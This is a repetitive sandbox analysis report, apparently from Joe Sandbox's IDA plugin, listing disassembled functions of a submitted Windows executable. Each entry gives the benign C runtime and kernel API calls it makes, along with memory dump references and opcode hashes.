Opcode ID: ff8021ae17d2e8957d69c99410b60825955446000d19f429f786a3e29013ea22
Instruction ID: f6b4e2719089449de6f972fec03718aa4df04236b69eb99f7bcc36a2e20dffa7
Opcode Fuzzy Hash: ff8021ae17d2e8957d69c99410b60825955446000d19f429f786a3e29013ea22
Instruction Fuzzy Hash: FDE1D132E04AC695E711EB35D8047EEB361FF19388F659332DA4877295EF38A885CB10

Function 00007FF7866172C0 Relevance: 6.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

APIs

__std_exception_destroy.VCRUNTIME140 ref: 00007FF7866173D1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866173FD
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661752B
__std_exception_copy.VCRUNTIME140 ref: 00007FF78661756D

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
String ID:
API String ID: 2138705365-0
Opcode ID: 9be24f6db715e1d39b030f97d5cb8fe78395b157149ac0233fed0782b7188fb7
Instruction ID: a28dab30f2c8855c71b14577ef579e961779b340f38f9afc6383927a2f171eaa
Opcode Fuzzy Hash: 9be24f6db715e1d39b030f97d5cb8fe78395b157149ac0233fed0782b7188fb7
Instruction Fuzzy Hash: A28190B2B04AC1A1EB04EF29D94436EA766FB04B88FA04032D74D07669EF78DDC5C750

Function 00007FF7865F81F0 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F834C
floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F8379
ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F83A0
ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F83C3

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: ceilffloorf
String ID:
API String ID: 300201839-0
Opcode ID: a0d0ff3d0fae75cab1a7ad58267d504a2da36a7ee6d947db0c903cf86cc6fcdc
Instruction ID: 2598b15cd0980f61af9f16d9964b9465075acf7b2512f14d110b4c191bfd0515
Opcode Fuzzy Hash: a0d0ff3d0fae75cab1a7ad58267d504a2da36a7ee6d947db0c903cf86cc6fcdc
Instruction Fuzzy Hash: 3B51FC33A1CBC145D3629F3194413BAF7A1BF69381F658332EAC866655EB3DD891CB10

Function 00007FF78662B410 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF786617151), ref: 00007FF78662B513
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF786617151), ref: 00007FF78662B566
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF786617151), ref: 00007FF78662B570
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78662B5BC

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: 1e51fdf01d76f39846ea8631ad2725d32a691cd3e5675770bc95c25aebbb1d81
Instruction ID: 3d2f3f34697bce6ba538466c8d2df838b3a8c3255d617338b185c52074156b12
Opcode Fuzzy Hash: 1e51fdf01d76f39846ea8631ad2725d32a691cd3e5675770bc95c25aebbb1d81
Instruction Fuzzy Hash: F241A271B04A81A1EA14EB15E94416EA393FB44BE8FE80731DA7D07BD9EE3CE841C711

Function 00007FF78662BDA0 Relevance: 6.1, APIs: 4, Instructions: 120COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF7866129C8), ref: 00007FF78662BEA1
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF7866129C8), ref: 00007FF78662BEB4
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00007FF7866129C8), ref: 00007FF78662BF27
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78662BF34

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: f6a8c7abaea74e2c99d9ddab3c56c85c386e53f3ad6ac37b94ac2cd5e52858e4
Instruction ID: 954bcbd45b6859f583f2c3888d4724de61461c5c5d51c7366b338cd74111c047
Opcode Fuzzy Hash: f6a8c7abaea74e2c99d9ddab3c56c85c386e53f3ad6ac37b94ac2cd5e52858e4
Instruction Fuzzy Hash: B741F622714AC5A1EA14EB25D8041BEA363FB48BE4FA84635DBAD07BD5CF3CD881C711

Function 00007FF786629F30 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FF786629F60
memcpy.VCRUNTIME140 ref: 00007FF78662A022
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662A075
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78662A082

Part of subcall function 00007FF78662CFB4: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF78662B985,?,?,?,?,?,00007FF786629EF5), ref: 00007FF78662CFCE

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 1155477157-0
Opcode ID: d11a557a0e569d27a6933a7b3627209942809bd707071fcc7ea5f756d4b35c05
Instruction ID: ede17d4a667450c9b1ee3780b56e1c43484ebd755770425867c9b7e3e4dab2c3
Opcode Fuzzy Hash: d11a557a0e569d27a6933a7b3627209942809bd707071fcc7ea5f756d4b35c05
Instruction Fuzzy Hash: F431E362B096C5A8FB55BB12AD003BB9253BB44FE8FA40231DA2C077C5DE7CE881C751

Function 00007FF78662B5D0 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000000,00000004,?,00007FF7866171FA), ref: 00007FF78662B6B2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000004,?,00007FF7866171FA), ref: 00007FF78662B6F0
memcpy.VCRUNTIME140 ref: 00007FF78662B6FA
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78662B72F

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: 0ceff8995869bf13223ddd3ef330eef13108ed78b29c66e720f296adefcf47d2
Instruction ID: a926f73e6a489636a88375fe179fc061a42372d4b1ff71edec55bbb0f6a7fb75
Opcode Fuzzy Hash: 0ceff8995869bf13223ddd3ef330eef13108ed78b29c66e720f296adefcf47d2
Instruction Fuzzy Hash: D331D461B097C1A4EF10AF16A94436AE253FB04BD8FA84231DE5D0BBD5DE7CE881C721

Function 00007FF7866292D0 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84d244ba0fd788321ac0c73d4124b7838d749fc27fa08525ec64a6da94c3c0bf
Instruction ID: 5bf7fc43cfc8223ba0e3861fbb793b96892e5a2fe727eb3b3444beafa12880b6
Opcode Fuzzy Hash: 84d244ba0fd788321ac0c73d4124b7838d749fc27fa08525ec64a6da94c3c0bf
Instruction Fuzzy Hash: 0B518732708B81D5DB509F69D85036EB3A6FB84B94FA44236DA5D47798DF3CC848CB11

Function 00007FF78662BC70 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,00007FF7866129C8), ref: 00007FF78662BCDD

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 077956a081d7893dd110ada6ad75908bd3227dad2f37f2570ffc20078c418672
Instruction ID: 22861b2c939666aff6e9885ac6e8cefaa52acba3ceba205bec5c3428a022de3c
Opcode Fuzzy Hash: 077956a081d7893dd110ada6ad75908bd3227dad2f37f2570ffc20078c418672
Instruction Fuzzy Hash: BC31D222B057C255EB156B65AD403BAA153AB14BE8F780631DE2C077D6DE3899C3C721

Function 00007FF7866296D0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,00007FF786612701), ref: 00007FF78662973A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00007FF786612701), ref: 00007FF7866297C0
memcpy.VCRUNTIME140(00000000,?,?,00007FF786612701), ref: 00007FF7866297E6
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78662980A

Part of subcall function 00007FF78662CFB4: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF78662B985,?,?,?,?,?,00007FF786629EF5), ref: 00007FF78662CFCE

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 1155477157-0
Opcode ID: 1ea37b342092893f6686898047e5bc51610504fcf042aded55a49cd361582d6c
Instruction ID: 1a4f5eb19cff8422ab5c2a437e075315e2cf53c45f79a639546795ef23a49ac9
Opcode Fuzzy Hash: 1ea37b342092893f6686898047e5bc51610504fcf042aded55a49cd361582d6c
Instruction Fuzzy Hash: 1F31A762B05781A1EB14AB129D4027AA297FB55BB4FB44B30D93D077D1DF3CE892C711

Function 00007FF78661E8C0 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E8F8
memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E998
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78661E9B6

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task
String ID:
API String ID: 326894585-0
Opcode ID: 05fadf9653c490a5e2dba9b0ebca9f3dbc00753941b367a68c662daf98e188de
Instruction ID: ffedcabc75370f26bd80906d5fe5208e47c8f2ff062d3edc726df1a343d7ea51
Opcode Fuzzy Hash: 05fadf9653c490a5e2dba9b0ebca9f3dbc00753941b367a68c662daf98e188de
Instruction Fuzzy Hash: A22129A2F097C665EA54BB11FD003BA9152BF047A4FA40A31DE6D067C2DE3CE882C710

Function 00007FF78662DA70 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF78662DAB9
GetLastError.KERNEL32 ref: 00007FF78662DAC7
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF78662AC24), ref: 00007FF78662DAFC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF78662AC24), ref: 00007FF78662DB0A

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: f63fd69c30a4689ddbf493c0d1f5714778cbe43d56e2c88d7a975bf0ea5e2649
Instruction ID: 818085201ba2ddf22c2483fbbcd82caf81509aab5236b70015411e1e925964d6
Opcode Fuzzy Hash: f63fd69c30a4689ddbf493c0d1f5714778cbe43d56e2c88d7a975bf0ea5e2649
Instruction Fuzzy Hash: 9F214772A18B8187E3209F11E84432EBAB6F789B84F640138DB8853B54CF3CD805CB00

Function 00007FF7865F2130 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7865F1F40: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865F1F99

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865F216B
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865F217D
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865F2185
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F21ED

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintffclosefflushfree
String ID:
API String ID: 2759974054-0
Opcode ID: 4b8cbb2eab82408cb72d5d77ddd86e032ff70fca4d004e22786f2319a7a853c9
Instruction ID: 4e6a606ef87e569c40a82ced2e5b67783e99f3b63543d088c0db73c5e7869021
Opcode Fuzzy Hash: 4b8cbb2eab82408cb72d5d77ddd86e032ff70fca4d004e22786f2319a7a853c9
Instruction Fuzzy Hash: 8E21BB75608AC291EB50BF90ED456BAB3A1FF40B80FA90136CE0D8B254DF2DAC85D730

Function 00007FF786616B50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

__std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF786616BC5

Part of subcall function 00007FF78662DA28: MultiByteToWideChar.KERNEL32 ref: 00007FF78662DA44
Part of subcall function 00007FF78662DA28: GetLastError.KERNEL32 ref: 00007FF78662DA52

__std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF786616C71

Part of subcall function 00007FF78662B410: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF786617151), ref: 00007FF78662B513

Strings

Unknown exception, xrefs: 00007FF786616F87

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: __std_fs_convert_narrow_to_wide$ByteCharErrorLastMultiWidememcpy
String ID: Unknown exception
API String ID: 3269794198-410509341
Opcode ID: 08ed18e22671eca5a9cc59e8032db38cd828cdea71cf05f907e4e316fac53c73
Instruction ID: 2864e64d85d638483b811e4ba3b97052d4a227d8fa0be82169cbf0b40421b731
Opcode Fuzzy Hash: 08ed18e22671eca5a9cc59e8032db38cd828cdea71cf05f907e4e316fac53c73
Instruction Fuzzy Hash: 403126A6B187C592EF14AF62E900A6EA296FB44FC8F645035EE4D47744DF3CE851CB40

Function 00007FF786611400 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF78661140B
__std_exception_copy.VCRUNTIME140 ref: 00007FF786611444

Strings

string too long, xrefs: 00007FF786611404

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: Xlength_error@std@@__std_exception_copy
String ID: string too long
API String ID: 127952674-2556327735
Opcode ID: 3c2f2a00601e6976b58f44fe5c75412df300512293b6c190c81cf762664ab9ad
Instruction ID: 27f2fd591eea5ffc343bdcde633352868c19685fbff9a2ff0dd47542a82c2f7d
Opcode Fuzzy Hash: 3c2f2a00601e6976b58f44fe5c75412df300512293b6c190c81cf762664ab9ad
Instruction Fuzzy Hash: F8E03061B15B85A1DB05AF61ED900A5B366FF18B14F949131C94C46324EF2CA9EDC710

Function 00007FF7865F9C40 Relevance: 5.2, APIs: 4, Instructions: 241COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F9CFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F9D67
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F9FFF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FA020

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: c093f19e11287bf58d1a03016f4ffd6d2ee3e786ed9673e3c65c96f13d03bbb8
Instruction ID: ba96afbd95324ab0dfe38f0788c03f5c07ae3dfdc22dd1b923b0948c62342c67
Opcode Fuzzy Hash: c093f19e11287bf58d1a03016f4ffd6d2ee3e786ed9673e3c65c96f13d03bbb8
Instruction Fuzzy Hash: BFB1D722E14F8596E712EB35D44427AF7A4FF99B84F149332FF4552664DB38E882CB10

Function 00007FF7865F34D0 Relevance: 5.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7865E83EF), ref: 00007FF7865F354F
memcpy.VCRUNTIME140(?,?,?,00007FF7865E83EF), ref: 00007FF7865F356B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7865E83EF), ref: 00007FF7865F358B
memcpy.VCRUNTIME140(?,?,?,00007FF7865E83EF), ref: 00007FF7865F35B9

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

